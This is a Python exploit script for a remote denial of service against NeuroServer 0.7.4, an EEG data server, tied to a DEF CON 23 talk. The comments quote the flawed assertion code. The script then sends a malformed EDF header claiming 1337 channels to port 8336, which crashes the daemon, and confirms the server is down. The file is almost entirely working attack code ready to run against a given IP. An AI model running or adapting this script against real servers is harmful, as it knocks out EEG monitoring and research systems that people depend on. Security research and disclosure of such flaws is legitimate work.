1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136 | #!/usr/bin/env python
#
# NeuroServer 0.7.4 Remote DoS
#
# Shown at DEF CON 23 (BioHacking Village)
# Brain Waves Surfing - (In)Security in EEG (Electroencephalography) Technologies
# Slides: http://goo.gl/44r1HH
#
# NeuroServer is an EEG (Electroencephalography) TCP/IP Transceiver
# http://openeeg.sourceforge.net/doc/sw/NeuroServer/
#
# Neuroserver mediates between the raw EEG devices and all the various EEG
# applications that the user may wish to run to analyse the incoming EEG data.
# Data is transmitted using TCP/IP, which means that the EEG data can just as
# easily pass over a network (or even the internet) as stay on the same machine.
# Standard EDF is used for header information and for file storage.
# The server is designed to run on Windows and Linux.
#
#------------------------------------------------------------------------------
#
# nsd (NeuroServer Daemon) stops if any assertion is triggered inside isValidREDF() at
# ~/NeuroServer-0.7.4/src/openedf.c:
# ...
# assert(isValidREDF(result));
# ...
# int isValidREDF(const struct EDFDecodedConfig *cfg)
# {
# int i;
# if (cfg->hdr.dataRecordSeconds != 1.0) {
# setLastError("The data record must be exactly 1 second, not %f.",
# cfg->hdr.dataRecordSeconds);
# return 0;
# }
# if (cfg->hdr.dataRecordChannels < 1) {
# setLastError("The data record must have at least one channel.");
# return 0;
# }
# if (cfg->chan[0].sampleCount < 1) {
# setLastError("Channel 0 must have at least one sample.");
# return 0;
# }
# for (i = 1; i < cfg->hdr.dataRecordChannels; ++i) {
# if (cfg->chan[i].sampleCount != cfg->chan[0].sampleCount) {
# setLastError("Channel %d has %d samples, but channel 0 has %d. These must be the same.", cfg->chan[i].sampleCount, cfg->chan[0].sampleCount);
# return 0;
# }
# }
# return 1;
# }
#
import socket
import time
import sys
# Malformed EDF header
# Spec: http://www.edfplus.info/specs/edf.html
EDF = "0 " # Version
EDF += "Alejandro Hernandez " # Patient Identification
EDF += "NeuroSky MindWave " # Recording Identification
EDF += "07.04.1520.55.28768 EDF+C " # Startdate of Recording
EDF += "29 " # Number of Data Records
EDF += "1 " # Duration of a Data Record in Seconds
EDF += "1337 " # Number of Signals. This value triggers the DoS: assert(cfg->hdr.dataRecordChannels < MAXCHANNELS);
EDF += "Electrode EDF Annotations " # Labels and other data per channel
EDF += "-32768 -1 32767 1 -32768 -32768 32767 32767 " # PhysiMin PhysiMax DigiMin DigiMax
if len(sys.argv) != 2:
print 'Usage: ' + __file__ + ' <NeuroServer IP>'
sys.exit(1)
print r'''
__,--"""""""""--,.
_ -\'" _\ ^-,_
,-" _/ \_
, / \ \
,' /_ | \
/ _____,--""" / ) \
/ / / ( |
| / / ) |
| / NeuroServer 0.7.4 Remote DoS \
( (_/\ ) / \
\ \_ ____,====""" / |
\ /" /"" |
\_ _,-" |___,-'--------'" |
"`------"" --" ,-' /
/ ---" /
\___/ __,-----,___ )
\ ,--'"============""""-'"
"-'" | |=================/
/___\===============/
/ |=============/"
\ \_________,-"
| |
| |
'''
neuroserver = (sys.argv[1], 8336)
s = socket.socket()
print '|- Connecting to %s on port %s\n' % neuroserver
try:
s.connect(neuroserver)
except Exception, e:
print '|- Can\'t connect to %s:%d' % neuroserver
print '|- Exception: %s' % (e)
sys.exit(1)
print '|- Entering in EEG role. NeuroServers\' response:'
s.send('eeg\n') # EEG role in NeuroServer
print '----------------------------------------------'
print s.recv(16).strip('\n')
print '----------------------------------------------'
print '|- Sending Malformed EDF header (%d bytes):' % len(EDF)
print '----------------------------------------------'
print EDF
print '----------------------------------------------\n'
s.send('setheader ' + EDF + '\n')
time.sleep(4)
print '|- NeuroServer should be dead now. Connecting...\n'
try:
s = socket.socket()
s.connect(neuroserver)
except Exception, e:
print '|- NeuroServer is down !'
print '|- Exception: %s' % (e)
else:
print '|- NeuroServer is still alive :-\, try again...'
finally:
s.close()
sys.exit(0);
|
